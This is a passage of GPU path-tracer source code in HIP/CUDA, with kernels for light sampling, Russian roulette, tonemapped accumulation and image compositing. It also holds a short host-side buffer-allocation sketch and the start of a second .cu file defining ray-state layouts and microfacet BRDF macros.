* intensity; emitter_color[2] = materials[mat_id].albedo[2] * intensity; } if (fmax(fmax(emitter_color[0], emitter_color[1]), emitter_color[2]) > 0.0f) { emitter_color[0] /= emitter_pdf; emitter_color[1] /= emitter_pdf; emitter_color[2] /= emitter_pdf; float ld_o[3]; RELATIVE_TO_BASIS(emitter_d, n, n_tangent, n_binormal, ld_o); float roughness[2] = { 1.0f - smoothness, 1.0f - smoothness }; float ln_facet[3]; ln_facet[0] = ld_i[0] + ld_o[0]; ln_facet[1] = ld_i[1] + ld_o[1]; ln_facet[2] = ld_i[2] + ld_o[2]; NORMALIZE(ln_facet); float coating_dropoff = fmin(smoothness * 2.0f, 1.0f); float sample_dice; PRNG(global_id, b_seeds_2.x, sample_dice); if (glass_material || (sample_dice >= metallic)) { // Dielectric interface bool refract = (ld_i[2] * ld_o[2]) <= 0.0f; if (refract) { // Refraction facet float ior = (ld_i[2] < 0.0f) ? (1.0f / 1.5f) : 1.5f; ln_facet[0] = ld_i[0] + ld_o[0] * ior; ln_facet[1] = ld_i[1] + ld_o[1] * ior; ln_facet[2] = ld_i[2] + ld_o[2] * ior; NORMALIZE(ln_facet); } if (ln_facet[2] < 0.0f) { ln_facet[0] *= -1.0f; ln_facet[1] *= -1.0f; ln_facet[2] *= -1.0f; } float dot_ni = DOT(ld_i, ln_facet); float d, gi, go, g; GGX_EVAL(ln_facet, roughness, d); float cos_theta_t, fresnel; DIELECTRIC_FRESNEL(dot_ni, 1.5f, cos_theta_t, fresnel); SMITH_G1(ld_i, ln_facet, roughness, gi); SMITH_G1(ld_o, ln_facet, roughness, go); g = gi * go; if (!refract) { // Reflect/transmit to diffuse. float reflect_sample; PRNG(global_id, b_seeds_2.y, reflect_sample); if (glass_material || (reflect_sample <= (fresnel * coating_dropoff))) { // Reflection if ((last_brdf_pdf == DIRAC_PDF) && (smoothness < 1.0f)) { if ((d == 0.0f) || (ld_i[2] == 0.0f)) { emitter_d[0] = FLT_MAX; brdf_pdf = DIRAC_PDF; } else { float model = fresnel * coating_dropoff * d * g / (4.0f * fabs(ld_i[2])); brdf_color[0] = model; brdf_color[1] = model; brdf_color[2] = model; float prob; prob = gi * fabs(dot_ni) * d / fabs(ld_i[2]); prob *= fresnel * coating_dropoff; float dwh_dwo = 1.0f / (4.0f * DOT(ld_o, ln_facet)); brdf_pdf = fabs(prob * dwh_dwo); } } else { emitter_d[0] = FLT_MAX; } } else { // Transmit to diffuse brdf_color[0] = albedo[0]; brdf_color[1] = albedo[1]; brdf_color[2] = albedo[2]; brdf_pdf = INV_PI * ld_o[2]; } } else { // Refraction if ((last_brdf_pdf == DIRAC_PDF) && (smoothness < 1.0f)) { if ((d == 0.0f) || (ld_i[2] == 0.0f)) { emitter_d[0] = FLT_MAX; brdf_pdf = DIRAC_PDF; } else { float ior = (ld_i[2] < 0.0f) ? (1.0f / 1.5f) : 1.5f; float dot_no = DOT(ln_facet, ld_o); float sqrt_denom = dot_ni + ior * dot_no; float model = ((1.0f - fresnel) * d * g * ior * ior * dot_ni * dot_no) / (ld_i[2] * sqrt_denom * sqrt_denom); model *= (ld_i[2] < 0.0f) ? 
1.5f : (1.0f / 1.5f); brdf_color[0] = albedo[0] * model; brdf_color[1] = albedo[1] * model; brdf_color[2] = albedo[2] * model; float prob; prob = gi * fabs(dot_ni) * d / fabs(ld_i[2]); prob *= fresnel * coating_dropoff; float dwh_dwo = (ior * ior * dot_no) / (sqrt_denom * sqrt_denom); brdf_pdf = fabs(prob * dwh_dwo); } } else { emitter_d[0] = FLT_MAX; } } } else { // Conductor if ((last_brdf_pdf == DIRAC_PDF) && (smoothness < 1.0f)) { float dot_ni = DOT(ln_facet, ld_i); float d, f, g, gi, go; GGX_EVAL(ln_facet, roughness, d); CONDUCTOR_FRESNEL(dot_ni, 1.5f, 3.0f, f); SMITH_G1(ld_i, ln_facet, roughness, gi); SMITH_G1(ld_o, ln_facet, roughness, go); g = gi * go; float model = f * (d * g / (4.0f * ld_i[2])); brdf_color[0] = albedo[0] * model; brdf_color[1] = albedo[1] * model; brdf_color[2] = albedo[2] * model; brdf_pdf = d * gi / (4.0f * ld_i[2]); } else { emitter_d[0] = FLT_MAX; } } } else { emitter_d[0] = FLT_MAX; } float mis = MIS(emitter_pdf, brdf_pdf); ray_state[RS_EMITTER_R] = old_throughput[0] * emitter_color[0] * brdf_color[0] * mis; ray_state[RS_EMITTER_G] = old_throughput[1] * emitter_color[1] * brdf_color[1] * mis; ray_state[RS_EMITTER_B] = old_throughput[2] * emitter_color[2] * brdf_color[2] * mis; } } ray_state[RS_SUN_D_X] = sun_d[0]; ray_state[RS_SUN_D_Y] = sun_d[1]; ray_state[RS_SUN_D_Z] = sun_d[2]; ray_state[RS_EMITTER_D_X] = emitter_d[0]; ray_state[RS_EMITTER_D_Y] = emitter_d[1]; ray_state[RS_EMITTER_D_Z] = emitter_d[2]; } /// __global__ void NEE(float* ray_state, Material* materials, int32_t use_nodes_image, hipTextureObject_t nodes_image, TwoNode* nodes, int32_t top_tree_offset, int32_t use_triangles_image, hipTextureObject_t triangles_image, TreeTriangle* triangles, hipTextureObject_t albedo_atlas, hipTextureObject_t emission_atlas, uint4 b_seeds, int32_t width, int32_t height) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int state = ray_state[RS_STATE]; if (state == STATE_END) { return; } float o[3]; o[0] = ray_state[RS_ORIGIN_X]; o[1] = ray_state[RS_ORIGIN_Y]; o[2] = ray_state[RS_ORIGIN_Z]; float sun_d[3]; sun_d[0] = ray_state[RS_SUN_D_X]; if (sun_d[0] < FLT_MAX) { sun_d[1] = ray_state[RS_SUN_D_Y]; sun_d[2] = ray_state[RS_SUN_D_Z]; float sun_o[3]; sun_o[0] = o[0] + (sun_d[0] * EPSILON); sun_o[1] = o[1] + (sun_d[1] * EPSILON); sun_o[2] = o[2] + (sun_d[2] * EPSILON); float h_t = FLT_MAX; OCCLUSION(sun_o, sun_d, use_nodes_image, use_triangles_image); if (h_t == FLT_MAX) { ray_state[RS_COLOR_R] += ray_state[RS_SUN_R]; ray_state[RS_COLOR_G] += ray_state[RS_SUN_G]; ray_state[RS_COLOR_B] += ray_state[RS_SUN_B]; } } float emitter_d[3]; emitter_d[0] = ray_state[RS_EMITTER_D_X]; if (emitter_d[0] < FLT_MAX) { emitter_d[1] = ray_state[RS_EMITTER_D_Y]; emitter_d[2] = ray_state[RS_EMITTER_D_Z]; float emitter_o[3]; emitter_o[0] = o[0] + (emitter_d[0] * EPSILON); emitter_o[1] = o[1] + (emitter_d[1] * EPSILON); emitter_o[2] = o[2] + (emitter_d[2] * EPSILON); float emitter_t = ray_state[RS_EMITTER_T] - (2.0f * EPSILON); float h_t = emitter_t; OCCLUSION(emitter_o, emitter_d, use_nodes_image, use_triangles_image); if (h_t == emitter_t) { ray_state[RS_COLOR_R] += ray_state[RS_EMITTER_R]; ray_state[RS_COLOR_G] += ray_state[RS_EMITTER_G]; ray_state[RS_COLOR_B] += ray_state[RS_EMITTER_B]; } } float throughput[3]; throughput[0] = ray_state[RS_THROUGHPUT_R]; throughput[1] = ray_state[RS_THROUGHPUT_G]; throughput[2] = ray_state[RS_THROUGHPUT_B]; float tp = fmax(fmax(throughput[0], throughput[1]), throughput[2]); if (tp <= 
THROUGHPUT_THRESHOLD) { ray_state[RS_STATE] = STATE_END; } else { float roulette_prob = tp; if (roulette_prob <= 1.0f) { float roulette; PRNG(global_id, b_seeds.z, roulette); if (roulette < roulette_prob) { float modify_throughput = 1.0f / roulette_prob; ray_state[RS_THROUGHPUT_R] = throughput[0] * modify_throughput; ray_state[RS_THROUGHPUT_G] = throughput[1] * modify_throughput; ray_state[RS_THROUGHPUT_B] = throughput[2] * modify_throughput; } else { ray_state[RS_STATE] = STATE_END; } } } } /// __global__ void Accumulate(float* ray_state, hipSurfaceObject_t target, ImageProperties image_properties, int32_t width, int32_t height, float inv_sample_count) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } float rgb[3]; rgb[0] = ray_state[RS_COLOR_R]; rgb[1] = ray_state[RS_COLOR_G]; rgb[2] = ray_state[RS_COLOR_B]; AVG_TONEMAP(rgb); float lum_coeff[3]; lum_coeff[0] = 0.2125f; lum_coeff[1] = 0.7154f; lum_coeff[2] = 0.0721f; float bright_rgb[3]; bright_rgb[0] = rgb[0] * image_properties.brightness; bright_rgb[1] = rgb[1] * image_properties.brightness; bright_rgb[2] = rgb[2] * image_properties.brightness; float intensity = DOT(bright_rgb, lum_coeff); float sat_color[3]; sat_color[0] = lerp(intensity, bright_rgb[0], image_properties.saturation); sat_color[1] = lerp(intensity, bright_rgb[1], image_properties.saturation); sat_color[2] = lerp(intensity, bright_rgb[2], image_properties.saturation); rgb[0] = lerp(0.5f, sat_color[0], image_properties.contrast); rgb[1] = lerp(0.5f, sat_color[1], image_properties.contrast); rgb[2] = lerp(0.5f, sat_color[2], image_properties.contrast); uchar4 target_color = make_uchar4(saturate(rgb[0]) * 255.0f, saturate(rgb[1]) * 255.0f, saturate(rgb[2]) * 255.0f, 255); int32_t x = global_id % width; int32_t y = global_id / width; surf2Dwrite(target_color, target, x * sizeof(uchar4), y, hipBoundaryModeClamp); } /// __global__ void CompositeTwo(hipSurfaceObject_t compositing_target_one, hipTextureObject_t compositing_target_two, hipSurfaceObject_t target, int32_t width, int32_t height) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int32_t x = global_id % width; int32_t y = global_id / width; uint4 c0 = make_uint4(surf2Dread<uchar4>(compositing_target_one, x * sizeof(uchar4), y, hipBoundaryModeClamp)); uint4 c1 = make_uint4(tex2D<uchar4>(compositing_target_two, x, y)); uint4 color = (c0 + c1) / make_uint4(2); uchar4 target_color = make_uchar4(color, 255); surf2Dwrite(target_color, target, x * sizeof(uchar4), y, hipBoundaryModeClamp); } /// __global__ void CompositeThree(hipSurfaceObject_t compositing_target_one, hipTextureObject_t compositing_target_two, hipTextureObject_t compositing_target_three, hipSurfaceObject_t target, int32_t width, int32_t height) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int32_t x = global_id % width; int32_t y = global_id / width; uint4 c0 = make_uint4(surf2Dread<uchar4>(compositing_target_one, x * sizeof(uchar4), y, hipBoundaryModeClamp)); uint4 c1 = make_uint4(tex2D<uchar4>(compositing_target_two, x, y)); uint4 c2 = make_uint4(tex2D<uchar4>(compositing_target_three, x, y)); uint4 color = (c0 + c1 + c2) / make_uint4(3); uchar4 target_color = make_uchar4(color, 255); surf2Dwrite(target_color, target, x * sizeof(uchar4), y, hipBoundaryModeClamp); } /// __global__ void CompositeFour(hipSurfaceObject_t compositing_target_one, hipTextureObject_t 
compositing_target_two, hipTextureObject_t compositing_target_three, hipTextureObject_t compositing_target_four, hipSurfaceObject_t target, int32_t width, int32_t height) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int32_t x = global_id % width; int32_t y = global_id / width; uint4 c0 = make_uint4(surf2Dread<uchar4>(compositing_target_one, x * sizeof(uchar4), y, hipBoundaryModeClamp)); uint4 c1 = make_uint4(tex2D<uchar4>(compositing_target_two, x, y)); uint4 c2 = make_uint4(tex2D<uchar4>(compositing_target_three, x, y)); uint4 c3 = make_uint4(tex2D<uchar4>(compositing_target_four, x, y)); uint4 color = (c0 + c1 + c2 + c3) / make_uint4(4); uchar4 target_color = make_uchar4(color, 255); surf2Dwrite(target_color, target, x * sizeof(uchar4), y, hipBoundaryModeClamp); } /// __global__ void CompositeFive(hipSurfaceObject_t compositing_target_one, hipTextureObject_t compositing_target_two, hipTextureObject_t compositing_target_three, hipTextureObject_t compositing_target_four, hipTextureObject_t compositing_target_five, hipSurfaceObject_t target, int32_t width, int32_t height) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int32_t x = global_id % width; int32_t y = global_id / width; uint4 c0 = make_uint4(surf2Dread<uchar4>(compositing_target_one, x * sizeof(uchar4), y, hipBoundaryModeClamp)); uint4 c1 = make_uint4(tex2D<uchar4>(compositing_target_two, x, y)); uint4 c2 = make_uint4(tex2D<uchar4>(compositing_target_three, x, y)); uint4 c3 = make_uint4(tex2D<uchar4>(compositing_target_four, x, y)); uint4 c4 = make_uint4(tex2D<uchar4>(compositing_target_five, x, y)); uint4 color = (c0 + c1 + c2 + c3 + c4) / make_uint4(5); uchar4 target_color = make_uchar4(color, 255); surf2Dwrite(target_color, target, x * sizeof(uchar4), y, hipBoundaryModeClamp); } }
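/*
 * Illustrative host-side sketch (not part of the original hip/cuda pair): it
 * shows one way the ray_state buffer implied by the RS_* plane layout could be
 * sized, and how a launch shape compatible with GET_GLOBAL_ID() (2-D grid of
 * 2-D blocks, flattened row-major) could be chosen. The plane count of 37, the
 * 16x16 block shape and the helper name AllocateRayStateSketch are assumptions
 * made for this sketch only; they are not taken from the original sources.
 */
#include <hip/hip_runtime.h>
#include <cmath>
#include <cstdint>

static float* AllocateRayStateSketch(int32_t width, int32_t height,
                                     dim3* grid, dim3* block) {
    const int32_t ray_count = width * height;
    // RS_PORTAL_B is the highest plane index (36), so 37 planes of ray_count floats.
    const size_t kRayStatePlanes = 37;
    const size_t bytes = kRayStatePlanes * (size_t)ray_count * sizeof(float);
    float* ray_state = nullptr;
    if (hipMalloc((void**)&ray_state, bytes) != hipSuccess) {
        return nullptr;
    }
    hipMemset(ray_state, 0, bytes);
    // Any grid * block product covering ray_count works, because every kernel
    // above early-outs on global_id >= ray_count; a square-ish grid of 16x16
    // blocks is one possible choice.
    *block = dim3(16, 16, 1);
    uint32_t blocks_needed = (uint32_t)((ray_count + 255) / 256);
    if (blocks_needed == 0) { blocks_needed = 1; }
    const uint32_t grid_x = (uint32_t)std::ceil(std::sqrt((double)blocks_needed));
    const uint32_t grid_y = (blocks_needed + grid_x - 1) / grid_x;
    *grid = dim3(grid_x, grid_y, 1);
    return ray_state;
}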
edeabfd7a613e9eaf6a420a69b425f51352b9c96.cu
#include <cstdio> #include <cstdint> #include <cfloat> #include "helper_math.cu.h" /// extern "C" { /// typedef struct TreeTriangle { float vertex[3]; float edges[2][3]; float vertex_normals[3][3]; float vertex_tangents[3][4]; float vertex_uvs[3][2]; float surface_normal[3]; float inverse_area; uint32_t material_id; uint32_t pad; } TreeTriangle; /// #define TRI_VERTEX (tri_pixel) #define TRI_EDGES_0 (tri_pixel + 3) #define TRI_EDGES_1 (tri_pixel + 6) #define TRI_VN_0 (tri_pixel + 9) #define TRI_VN_1 (tri_pixel + 12) #define TRI_VN_2 (tri_pixel + 15) #define TRI_VT_0 (tri_pixel + 18) #define TRI_VT_1 (tri_pixel + 22) #define TRI_VT_2 (tri_pixel + 26) #define TRI_UV_0 (tri_pixel + 30) #define TRI_UV_1 (tri_pixel + 32) #define TRI_UV_2 (tri_pixel + 34) #define TRI_SURF_N (tri_pixel + 36) #define TRI_INV_AREA (tri_pixel + 39) #define TRI_MAT_ID (tri_pixel + 40) /// /* typedef struct FourNode { uint32_t child[4]; uint32_t extra[2]; float ll_bounds[6]; float lr_bounds[6]; float rl_bounds[6]; float rr_bounds[6]; float padding[2]; } FourNode; /// #define NODE_LL (node_pixel + 0) #define NODE_LR (node_pixel + 1) #define NODE_RL (node_pixel + 2) #define NODE_RR (node_pixel + 3) #define NODE_EXTRA_0 (node_pixel + 4) #define NODE_EXTRA_1 (node_pixel + 5) #define NODE_LL_BOUNDS (node_pixel + 6) #define NODE_LR_BOUNDS (node_pixel + 12) #define NODE_RL_BOUNDS (node_pixel + 18) #define NODE_RR_BOUNDS (node_pixel + 24) */ /// typedef struct TwoNode { uint32_t child[2]; uint32_t extra[2]; float l_bounds[6]; float r_bounds[6]; } TwoNode; /// #define NODE_L (node_pixel + 0) #define NODE_R (node_pixel + 1) #define NODE_EXTRA_0 (node_pixel + 2) #define NODE_EXTRA_1 (node_pixel + 3) #define NODE_L_BOUNDS (node_pixel + 4) #define NODE_R_BOUNDS (node_pixel + 10) /// typedef struct Camera { float aperture_size; float focal_depth; float transform[16]; float root_pixel[2]; float pixel_offset[2]; float image_plane_distance; float padding; } Camera; /// typedef struct Material { uint32_t map_flags; int32_t double_sided; float albedo[4]; float metallic; float smoothness; float glass; float emission; float albedo_bounds[4]; float normal_bounds[4]; float metallic_bounds[4]; float emission_bounds[4]; } Material; /// typedef struct Sun { float direction[4]; float sun_intensity; float sky_intensity; float color[4]; } Sun; /// typedef struct EnvironmentProperties { float intensity; float rotation; } EnvironmentProperties; /// typedef struct EmitterIndex { uint mesh_triangle_offset; uint triangle_offset; } EmitterIndex; /// typedef struct PortalIndex { uint mesh_triangle_offset; uint triangle_offset; } PortalIndex; /// typedef struct ImageProperties { int tonemap; float gamma; float exposure; float contrast; float saturation; float brightness; } ImageProperties; /// #define TREE_LEAF_TRIANGLE_FACTOR 3 /// #define HM_TEST_NODES 0x0 #define HM_LEFT 0x2 #define HM_RIGHT 0x1 #define HM_BOTH 0x3 /// #define LB_NEW_SUB_TREE 0xFFFFFFFF /// #define TREE_LEAF 0x80000000 #define TREE_LEAF_MASK 0x7FFFFFFF #define TREE_SUB_TREE 0x40000000 #define TREE_SUB_TREE_MASK 0x3FFFFFFF #define TREE_TRAIL_END 0x7FFFFFFF #define TREE_NO_LEAF_HIT 0xFFFFFFFF #define NO_TRI_HIT INT_MAX /// #define DOUBLE_SIDED_FLAG 0x80000000 #define DOUBLE_SIDED_MASK 0x7FFFFFFF /// #define THROUGHPUT_THRESHOLD 0.05f /// #define DIRAC_PDF FLT_MAX /// #define MAP_FLAG_ALBEDO 0x1 #define MAP_FLAG_NORMAL 0x2 #define MAP_FLAG_METALLIC 0x4 #define MAP_FLAG_EMISSION 0x8 /// #define SUN_COS_THETA 0.9996f /// #define STATE_ENVIRONMENT 0x0 #define STATE_EMISSIVE 0x1 #define 
STATE_MATERIAL 0x2 #define STATE_SECONDARY 0x3 #define STATE_END 0x4 /// #define RS_STATE (ray_count * 0 + global_id) #define RS_ORIGIN_X (ray_count * 1 + global_id) #define RS_ORIGIN_Y (ray_count * 2 + global_id) #define RS_ORIGIN_Z (ray_count * 3 + global_id) #define RS_DIR_X (ray_count * 4 + global_id) #define RS_DIR_Y (ray_count * 5 + global_id) #define RS_DIR_Z (ray_count * 6 + global_id) #define RS_U (ray_count * 7 + global_id) #define RS_V (ray_count * 8 + global_id) #define RS_HIT_DISTANCE (ray_count * 9 + global_id) #define RS_TRI_INDEX (ray_count * 10 + global_id) #define RS_LAST_BRDF_PDF (ray_count * 11 + global_id) #define RS_THROUGHPUT_R (ray_count * 12 + global_id) #define RS_THROUGHPUT_G (ray_count * 13 + global_id) #define RS_THROUGHPUT_B (ray_count * 14 + global_id) #define RS_COLOR_R (ray_count * 15 + global_id) #define RS_COLOR_G (ray_count * 16 + global_id) #define RS_COLOR_B (ray_count * 17 + global_id) #define RS_SUN_D_X (ray_count * 18 + global_id) #define RS_SUN_D_Y (ray_count * 19 + global_id) #define RS_SUN_D_Z (ray_count * 20 + global_id) #define RS_SUN_R (ray_count * 21 + global_id) #define RS_SUN_G (ray_count * 22 + global_id) #define RS_SUN_B (ray_count * 23 + global_id) #define RS_EMITTER_D_X (ray_count * 24 + global_id) #define RS_EMITTER_D_Y (ray_count * 25 + global_id) #define RS_EMITTER_D_Z (ray_count * 26 + global_id) #define RS_EMITTER_T (ray_count * 27 + global_id) #define RS_EMITTER_R (ray_count * 28 + global_id) #define RS_EMITTER_G (ray_count * 29 + global_id) #define RS_EMITTER_B (ray_count * 30 + global_id) #define RS_PORTAL_D_X (ray_count * 31 + global_id) #define RS_PORTAL_D_Y (ray_count * 32 + global_id) #define RS_PORTAL_D_Z (ray_count * 33 + global_id) #define RS_PORTAL_R (ray_count * 34 + global_id) #define RS_PORTAL_G (ray_count * 35 + global_id) #define RS_PORTAL_B (ray_count * 36 + global_id) /// #define GET_GLOBAL_ID() \ ((blockIdx.y * gridDim.x + blockIdx.x) * \ (blockDim.x * blockDim.y) + \ (threadIdx.y * blockDim.x + threadIdx.x)) /// #define HI_EPSILON 0.01f #define EPSILON 0.0001f #define LO_EPSILON 0.000001f #define PI 3.14159265359f #define INV_PI 0.31830988618f #define TAU 6.28318530718f #define INV_TAU 0.15915494309 /// #define PRNG(P, SEED, R) \ { \ uint hash = SEED; \ hash ^= P; \ hash += (hash << 10); \ hash ^= (hash >> 6); \ hash += (hash << 3); \ hash ^= (hash >> 11); \ hash += (hash << 15); \ hash ^= hash >> 16; \ hash *= 0x85EBCA6B; \ hash ^= hash >> 13; \ hash *= 0xC2B2AE35; \ hash ^= hash >> 16; \ hash &= 0x007FFFFFu; \ hash |= 0x3F800000u; \ R = *((float*)&hash) - 1.0f; \ R = fmax(EPSILON, R); \ } /// #define TRANSFORM_X(P, MAT, R) { \ R[0] = P[0] * MAT[0] + P[1] * MAT[4] + P[2] * MAT[8] + MAT[12]; \ } #define TRANSFORM_Y(P, MAT, R) { \ R[1] = P[0] * MAT[1] + P[1] * MAT[5] + P[2] * MAT[9] + MAT[13]; \ } #define TRANSFORM_Z(P, MAT, R) { \ R[2] = P[0] * MAT[2] + P[1] * MAT[6] + P[2] * MAT[10] + MAT[14]; \ } #define TRANSFORM_W(P, MAT, R) { \ R[3] = P[0] * MAT[3] + P[1] * MAT[7] + P[2] * MAT[11] + MAT[15]; \ } /// #define DOT(A, B) (A[0] * B[0] + A[1] * B[1] + A[2] * B[2]) /// #define CROSS(A, B, C) { \ C[0] = A[1] * B[2] - A[2] * B[1]; \ C[1] = A[2] * B[0] - A[0] * B[2]; \ C[2] = A[0] * B[1] - A[1] * B[0]; \ } /// #define NOT_ZERO(A) copysignf(fmax(LO_EPSILON, fabs(A)), (A)) /// #define NORMALIZE(V) \ { \ float length = sqrt(V[0] * V[0] + V[1] * V[1] + V[2] * V[2]); \ float inv_length = 1.0f / NOT_ZERO(length); \ V[0] *= inv_length; \ V[1] *= inv_length; \ V[2] *= inv_length; \ } /// #define GGX_SAMPLE(D_I, ROUGHNESS, 
RXF, RYF, N) \ { \ float stretched[3]; \ stretched[0] = ROUGHNESS[0] * D_I[0]; \ stretched[1] = ROUGHNESS[1] * D_I[1]; \ stretched[2] = D_I[2]; \ NORMALIZE(stretched); \ float up[3]; \ up[0] = 0.0f; \ up[1] = 0.0f; \ up[2] = 1.0f; \ float t1[3]; \ CROSS(stretched, up, t1); \ if (stretched[2] < 0.9999f) { \ NORMALIZE(t1); \ } else { \ t1[0] = 1.0f; \ t1[1] = 0.0f; \ t1[2] = 0.0f; \ } \ float t2[3]; \ CROSS(t1, stretched, t2); \ float a = 1.0f / (1.0f + stretched[2]); \ float r = sqrt(RXF); \ float phi = (RYF < a) ? RYF / a * PI : PI + (RYF - a) / (1.0f - a) * PI; \ float p1 = r * cos(phi); \ float p2 = r * sin(phi) * ((RYF < a) ? 1.0f : stretched[2]); \ N[0] = ROUGHNESS[0] * \ (p1 * t1[0] + p2 * t2[0] + sqrt(1.0f - p1 * p1 - p2 * p2) * stretched[0]); \ N[1] = ROUGHNESS[1] * \ (p1 * t1[1] + p2 * t2[1] + sqrt(1.0f - p1 * p1 - p2 * p2) * stretched[1]); \ N[2] = (p1 * t1[2] + p2 * t2[2] + sqrt(1.0f - p1 * p1 - p2 * p2) * stretched[2]); \ NORMALIZE(N); \ } /// #define TAN_THETA(V, T) \ { \ float temp = 1.0f - V[2] * V[2]; \ if (temp <= 0.0f) { \ T = 0.0f; \ } else { \ T = sqrt(temp) / V[2]; \ } \ } /// #define SIN_THETA_2(V, T) \ { \ T = 1.0f - V[2] * V[2]; \ } /// #define PROJECT_ROUGHNESS(V, ROUGHNESS, R) \ { \ float sin_theta_2; \ SIN_THETA_2(V, sin_theta_2); \ float inv_sin_theta_2 = 1.0f / sin_theta_2; \ if ((ROUGHNESS[0] == ROUGHNESS[1]) || (inv_sin_theta_2 <= 0.0f)) { \ R = ROUGHNESS[0]; \ } else { \ float cos_phi_2 = V[0] * V[0] * inv_sin_theta_2; \ float sin_phi_2 = V[1] * V[1] * inv_sin_theta_2; \ R = sqrt(cos_phi_2 * ROUGHNESS[0] * ROUGHNESS[0] + \ sin_phi_2 * ROUGHNESS[1] * ROUGHNESS[1]); \ } \ } /// #define HYPOT_2(A, B, R) \ { \ if (fabs(A) > fabs(B)) { \ R = B / A; \ R = fabs(A) * sqrt(1.0f + R * R); \ } else if (B != 0.0f) { \ R = A / B; \ R = fabs(B) * sqrt(1.0f + R * R); \ } else {\ R = 0.0f; \ } \ } /// #define SMITH_G1(V, N, ROUGHNESS, G1) \ { \ if ((DOT(N, V) * V[2]) <= 0.0f) { \ G1 = 0.0f; \ } else { \ float tan_theta; \ TAN_THETA(V, tan_theta); \ tan_theta = fabs(tan_theta); \ if (tan_theta == 0.0f) { \ G1 = 1.0f; \ } else { \ float alpha; \ PROJECT_ROUGHNESS(V, ROUGHNESS, alpha); \ float root = alpha * tan_theta; \ float hypot_2; \ HYPOT_2(1.0f, root, hypot_2); \ G1 = 2.0f / (1.0f + hypot_2); \ } \ } \ } /// #define GGX_EVAL(N, ROUGHNESS, R) \ { \ if (N[2] <= 0.0f) { \ R = 0.0f; \ } else { \ float cos_theta_2 = N[2] * N[2]; \ float exponent = ((N[0] * N[0]) / (ROUGHNESS[0] * ROUGHNESS[0]) + \ (N[1] * N[1]) / (ROUGHNESS[1] * ROUGHNESS[1])) / cos_theta_2; \ float root = (1.0f + exponent) * cos_theta_2; \ R = 1.0f / (PI * ROUGHNESS[0] * ROUGHNESS[1] * root * root); \ } \ } /// #define AVG_TONEMAP(RGB) \ { \ RGB[0] *= inv_sample_count; \ RGB[1] *= inv_sample_count; \ RGB[2] *= inv_sample_count; \ RGB[0] *= image_properties.exposure + 2.0f; \ RGB[1] *= image_properties.exposure + 2.0f; \ RGB[2] *= image_properties.exposure + 2.0f; \ if (image_properties.tonemap) { \ RGB[0] = ((RGB[0] * (0.15f * RGB[0] + 0.10f * 0.5f) + 0.20f * 0.02f) / \ (RGB[0] * (0.15f * RGB[0] + 0.5f) + 0.2f * 0.3f)) - (0.02f / 0.3f); \ RGB[1] = ((RGB[1] * (0.15f * RGB[1] + 0.10f * 0.5f) + 0.20f * 0.02f) / \ (RGB[1] * (0.15f * RGB[1] + 0.5f) + 0.2f * 0.3f)) - (0.02f / 0.3f); \ RGB[2] = ((RGB[2] * (0.15f * RGB[2] + 0.10f * 0.5f) + 0.20f * 0.02f) / \ (RGB[2] * (0.15f * RGB[2] + 0.5f) + 0.2f * 0.3f)) - (0.02f / 0.3f); \ float whitescale = 11.2f; \ whitescale = ((whitescale * (0.15f * whitescale + 0.10f * 0.5f) + \ 0.20f * 0.02f) / (whitescale * (0.15f * whitescale + 0.5f) + \ 0.2f * 0.3f)) - (0.02f / 0.3f); \ 
whitescale = 1.0f / whitescale; \ RGB[0] *= whitescale; \ RGB[1] *= whitescale; \ RGB[2] *= whitescale; \ } \ RGB[0] = pow(RGB[0], 1.0f / image_properties.gamma); \ RGB[1] = pow(RGB[1], 1.0f / image_properties.gamma); \ RGB[2] = pow(RGB[2], 1.0f / image_properties.gamma); \ } /// #define MIS(A, B) ((A * A) / (A * A + B * B)) /// #define CONCENTRIC_HEMI(R0, R1, D) \ { \ R0 = 2.0f * R0 - 1.0f; \ R1 = 2.0f * R1 - 1.0f; \ float phi, r; \ if (R0 == 0.0f && R1 == 0.0f) { \ r = phi = 0.0f; \ } else if ((R0 * R0) > (R1 * R1)) { \ r = R0; \ phi = (PI * 0.25f) * (R1 / (R0)); \ } else { \ r = R1; \ phi = (PI * 0.5f) - (R0 / (R1)) * (PI * 0.25f); \ } \ float cos_phi = cos(phi); \ float sin_phi = sin(phi); \ D[0] = r * cos_phi; \ D[1] = r * sin_phi; \ D[2] = sqrt(fmax(0.0f, 1.0f - D[0] * D[0] - D[1] * D[1])); \ NORMALIZE(D); \ } /// #define GET_BASIS(N, T, B) \ {\ float z = 1.0f + N[2]; \ float a = 1.0f / NOT_ZERO(z); \ float b = -N[0] * N[1] * a; \ T[0] = 1.0f - N[0] * N[0] * a; \ T[1] = b; \ T[2] = -N[0]; \ B[0] = b; \ B[1] = 1.0f - N[1] * N[1] * a; \ B[2] = -N[1]; \ } /// #define GET_VT_BASIS(N, T, B) \ {\ float flip_binormal; \ if (use_triangles_image) { \ T[0] = w * tex1Dfetch<float>(triangles_image, TRI_VT_0) + \ u * tex1Dfetch<float>(triangles_image, TRI_VT_1) + \ v * tex1Dfetch<float>(triangles_image, TRI_VT_2); \ T[1] = w * tex1Dfetch<float>(triangles_image, TRI_VT_0 + 1) + \ u * tex1Dfetch<float>(triangles_image, TRI_VT_1 + 1) + \ v * tex1Dfetch<float>(triangles_image, TRI_VT_2 + 1); \ T[2] = w * tex1Dfetch<float>(triangles_image, TRI_VT_0 + 2) + \ u * tex1Dfetch<float>(triangles_image, TRI_VT_1 + 2) + \ v * tex1Dfetch<float>(triangles_image, TRI_VT_2 + 2); \ flip_binormal = w * tex1Dfetch<float>(triangles_image, TRI_VT_0 + 3) + \ u * tex1Dfetch<float>(triangles_image, TRI_VT_1 + 3) + \ v * tex1Dfetch<float>(triangles_image, TRI_VT_2 + 3); \ } else { \ T[0] = w * triangles[tri_index].vertex_tangents[0][0] + \ u * triangles[tri_index].vertex_tangents[1][0] + \ v * triangles[tri_index].vertex_tangents[2][0]; \ T[1] = w * triangles[tri_index].vertex_tangents[0][1] + \ u * triangles[tri_index].vertex_tangents[1][1] + \ v * triangles[tri_index].vertex_tangents[2][1]; \ T[2] = w * triangles[tri_index].vertex_tangents[0][2] + \ u * 